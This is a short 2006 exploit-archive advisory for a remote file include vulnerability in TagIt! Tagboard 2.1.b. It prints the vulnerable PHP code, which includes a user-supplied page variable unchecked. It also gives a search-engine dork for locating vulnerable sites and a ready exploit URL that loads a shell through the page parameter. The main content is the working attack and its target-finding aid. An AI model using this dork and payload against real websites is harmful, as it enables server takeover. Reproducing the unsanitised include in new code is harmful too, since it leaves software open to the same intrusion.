TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
# Published : 2006-09-28
# Author : Kernel-32
# Previous Title : Les Visiteurs (Visitors) <= 2.0 (config.inc.php) File Include Vulnerability
# Next Title : phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability

Tagmin C.C 2.1.B Remote File Include
########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell

# www.Syue.com [2006-09-28]